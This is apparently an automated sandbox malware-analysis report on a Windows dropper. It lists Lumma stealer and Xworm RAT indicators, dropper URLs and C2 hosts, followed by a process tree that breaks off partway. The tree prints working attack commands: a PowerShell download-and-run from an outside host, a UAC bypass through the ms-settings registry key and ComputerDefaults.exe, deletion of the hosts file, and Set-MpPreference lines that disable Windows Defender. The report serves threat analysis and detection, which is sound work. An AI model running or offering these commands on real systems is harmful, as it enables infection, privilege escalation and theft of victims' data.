Analysis

  • max time kernel
    299s
  • max time network
    303s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-11-2024 01:49

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

lumma

C2

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

https://frogmen-smell.sbs

Extracted

Family

xworm

Version

5.0

C2

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 58 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 11 IoCs
  • Launches sc.exe 9 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 3 IoCs
  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:560
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:992
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:772
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1064
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1072
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1196
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1220
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1252
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1408
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                              PID:1452
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1488
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:420
                                    • C:\Windows\SysWOW64\svchost.exe
                                      "C:\Windows\System32\svchost.exe"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3400
                                    • C:\Windows\SysWOW64\svchost.exe
                                      "C:\Windows\System32\svchost.exe"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4432
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                  1⤵
                                    PID:1620
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1644
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1664
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1796
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1820
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1848
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1972
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1952
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1996
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1092
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2080
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2128
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2284
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2364
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2372
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                  PID:2412
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2452
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2532
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2552
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2572
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2592
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2600
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:388
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:1344
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                    PID:3312
                                                                                    • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3232
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        3⤵
                                                                                          PID:3740
                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:3600
                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies system certificate store
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2332
                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                            tasklist
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4372
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic os get Caption,Version
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2512
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic os get InstallDate
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3500
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -command [CultureInfo]::InstalledUICulture.Name
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:1872
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2528
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic memorychip get Capacity
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2704
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic path win32_videocontroller get Name
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Detects videocard installed
                                                                                            PID:5116
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic csproduct get UUID
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4800
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic csproduct get UUID
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1508
                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                            tasklist
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1884
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic os get Caption,Version
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4428
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic os get InstallDate
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:932
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -command [CultureInfo]::InstalledUICulture.Name
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:2688
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4876
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic memorychip get Capacity
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5112
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic path win32_videocontroller get Name
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Detects videocard installed
                                                                                            PID:3428
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic csproduct get UUID
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3612
                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                            wmic csproduct get UUID
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1008
                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3096
                                                                                          • C:\Users\Admin\AppData\Local\Temp\e581604\TikTok18.exe
                                                                                            run=1 shortcut="C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2976
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c .\TikTok18.bat
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2028
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";
                                                                                                6⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:4892
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /c C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe;
                                                                                                6⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2204
                                                                                                • C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe ;
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4352
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1100
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 300
                                                                                                    8⤵
                                                                                                    • Program crash
                                                                                                    PID:4868
                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3336
                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4536
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 300
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:1896
                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4948
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                            4⤵
                                                                                              PID:2392
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                5⤵
                                                                                                  PID:3564
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2998.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                                                                                                4⤵
                                                                                                  PID:2616
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2998.vbs" /f
                                                                                                    5⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:3872
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                                                                                                    5⤵
                                                                                                    • Modifies registry class
                                                                                                    PID:3016
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  /c start /B ComputerDefaults.exe
                                                                                                  4⤵
                                                                                                    PID:2484
                                                                                                    • C:\Windows\system32\ComputerDefaults.exe
                                                                                                      ComputerDefaults.exe
                                                                                                      5⤵
                                                                                                        PID:3908
                                                                                                        • C:\Windows\system32\wscript.exe
                                                                                                          "wscript.exe" C:\Users\Admin\AppData\Local\Temp\2998.vbs
                                                                                                          6⤵
                                                                                                            PID:4736
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                                                                                                              7⤵
                                                                                                                PID:3416
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          /c del /f C:\Users\Admin\AppData\Local\Temp\2998.vbs
                                                                                                          4⤵
                                                                                                            PID:2864
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                            4⤵
                                                                                                              PID:3300
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                5⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:4748
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                              4⤵
                                                                                                                PID:4588
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                  5⤵
                                                                                                                    PID:2432
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2510.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                                                                                                                  4⤵
                                                                                                                    PID:1516
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2510.vbs" /f
                                                                                                                      5⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:1420
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                                                                                                                      5⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:4568
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    /c start /B ComputerDefaults.exe
                                                                                                                    4⤵
                                                                                                                      PID:1084
                                                                                                                      • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                        ComputerDefaults.exe
                                                                                                                        5⤵
                                                                                                                          PID:2512
                                                                                                                          • C:\Windows\system32\wscript.exe
                                                                                                                            "wscript.exe" C:\Users\Admin\AppData\Local\Temp\2510.vbs
                                                                                                                            6⤵
                                                                                                                              PID:4864
                                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                                "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
                                                                                                                                7⤵
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                PID:4396
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          /c del /f C:\Users\Admin\AppData\Local\Temp\2510.vbs
                                                                                                                          4⤵
                                                                                                                            PID:4236
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                            4⤵
                                                                                                                              PID:1872
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                                5⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:5056
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                              4⤵
                                                                                                                                PID:3140
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:4084
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4911.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                                                                                                                                  4⤵
                                                                                                                                    PID:2256
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4911.vbs" /f
                                                                                                                                      5⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:2996
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                                                                                                                                      5⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:4816
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    /c start /B ComputerDefaults.exe
                                                                                                                                    4⤵
                                                                                                                                      PID:3744
                                                                                                                                      • C:\Windows\system32\ComputerDefaults.exe
                                                                                                                                        ComputerDefaults.exe
                                                                                                                                        5⤵
                                                                                                                                          PID:4624
                                                                                                                                          • C:\Windows\system32\wscript.exe
                                                                                                                                            "wscript.exe" C:\Users\Admin\AppData\Local\Temp\4911.vbs
                                                                                                                                            6⤵
                                                                                                                                              PID:400
                                                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                                                "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
                                                                                                                                                7⤵
                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                PID:1572
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          /c del /f C:\Users\Admin\AppData\Local\Temp\4911.vbs
                                                                                                                                          4⤵
                                                                                                                                            PID:4968
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                                            4⤵
                                                                                                                                              PID:4416
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                                                                                                                                5⤵
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:480
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\filer.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:3840
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe
                                                                                                                                              4⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:1496
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                              4⤵
